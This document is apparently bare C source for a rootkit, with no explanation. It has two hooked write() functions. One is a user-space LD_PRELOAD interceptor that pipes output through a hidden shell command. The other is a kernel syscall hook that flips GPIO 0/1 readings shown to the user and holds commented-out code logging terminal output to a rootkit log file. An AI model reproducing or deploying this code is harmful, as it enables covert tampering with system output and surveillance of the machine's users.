ssize_t write(int fildes, const void *buf, size_t nbyte) { int shouldcrypt ; shouldcrypt = isvalueinarray(fildes, filedesyes, 2) ; if (shouldcrypt == 1) { const char * buffer = (const char *)buf ; char *based = base64(buffer, nbyte); char toexecute[strlen(based)+strlen(command)] ; memset(toexecute, '\0', strlen(based)+strlen(command)); FILE *fp; char retcommand[2048]; memset(retcommand, '\0', 2048); strncat(toexecute, command, strlen(command)); strncat(toexecute, based, strlen(based)); strncat(toexecute, endcommand, 2); int *(*original_write)(int fildes, const void *buf, size_t nbyte); original_write = dlsym(RTLD_NEXT, "write"); fp = popen(toexecute, "r"); if (fp == NULL) { printf("Failed to run command\n" ); exit(1); } while (fgets(retcommand, sizeof(retcommand)-1, fp) != NULL) { original_write(fildes, retcommand, strlen(retcommand)) ; } pclose(fp); return(nbyte) ; } else { int *(*original_write)(int fildes, const void *buf, size_t nbyte); original_write = dlsym(RTLD_NEXT, "write"); original_write(fildes, buf, nbyte) ; return(nbyte); } }
asmlinkage ssize_t hacked_write(int fd, char *buf, size_t count) { int ret = original_write(fd, buf, count); char *needle_ptr = buf; //struct file *file; //mm_segment_t old_fs; //loff_t pos = 0; //char *command_to_find = "echotest";//"echoout>/sys/class/gpio/gpio4/direction"; //bool exported = false; //if(CheckGPIOIsOutput(4)){ // if GPIO 4 is exported, start hijacking output written if(HOOK_WRITE){ // if cat /sys/class/gpio/gpio4/value is called, hack the output if(*needle_ptr=='0' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) { printk("In case 1\n"); needle_ptr[0]='1'; original_write(fd, needle_ptr, 2); return count; } else if (*needle_ptr=='1' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) { printk("In case 2\n"); needle_ptr[0]='0'; original_write(fd, needle_ptr, 2); return count; } HOOK_WRITE=false; } /* if(IS_COMMAND && fd==1){ // if user pressed enter struct file *file; mm_segment_t old_fs; loff_t pos = 0; old_fs = get_fs(); set_fs(KERNEL_DS); //disable_file_hiding(); file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644); if(IS_ERR(file)){ //printk("CREATE FILE ERROR %d...\n", ERR_PTR(file)); //return -1; } else{ if(file && ret>0){ pos=0; vfs_write(file, buf, strlen(buf), &pos); printk("Copying from user sys_write: %s...\n\n", buf); filp_close(file, NULL); //enable_file_hiding(); }else{ if(!file) printk("OPEN FILE ERROR 111...\n"); else if(ret<=0) printk("OPEN FILE ERROR 222...\n"); } } set_fs(old_fs); IS_COMMAND=false; }*/ /* if(fd==1){ old_fs = get_fs(); set_fs(KERNEL_DS); file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644); if(IS_ERR(file)){ //printk("CREATE FILE ERROR %d...\n", ERR_PTR(file)); //return -1; } else{ if(file && ret>0){ pos=0; vfs_write(file, buf, strlen(buf), &pos); //vfs_write(file, test_buffer, strlen(test_buffer), &pos); printk("Copying from user...\n\n"); filp_close(file, NULL); }else{ if(!file) printk("OPEN FILE ERROR 111...\n"); else if(ret<=0) printk("OPEN FILE ERROR 222...\n"); } } set_fs(old_fs); }*/ return ret; }